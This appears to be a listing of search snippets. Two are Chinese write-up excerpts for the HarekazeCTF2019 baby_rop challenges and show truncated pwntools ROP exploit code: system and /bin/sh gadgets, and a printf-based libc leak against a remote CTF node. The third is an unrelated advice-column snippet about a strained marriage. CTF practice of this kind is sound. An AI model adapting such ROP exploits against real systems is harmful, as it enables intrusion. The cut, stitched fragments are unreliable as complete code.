[HarekazeCTF2019]baby_rop pwn真的是越玩越上瘾 这是一个x64的栈溢出rop,常规操作: 存在system存在binsh字符串。 太好办了 exp: frompwnimport*importtime context.log_level ='debug'sh = remote('node4.buuoj.cn',28883)# sh = process('./babyrop')p_system =0x0000000000400490p_binsh =0x000000000...
网上很多答案用printf的时候还先pop一个%s的格式串,纯属画蛇添足。 exp: frompwnimport*fromLibcSearcher.LibcSearcherimport* context.log_level ='debug'elf = ELF('./babyrop2') libc = ELF('./libc.so.6')# p = process('./babyrop2')p = remote('node4.buuoj.cn',27532) p_plt_printf = el...
Advice: Ask Relate - Baby Love Has Driven Us apart.(ROP)Q Ever since my wife went back to work after our baby was born she has been like a bear with a sore head. Everything I do is wrong and she constantly shouts at me.Birmingham Evening Mail (England)...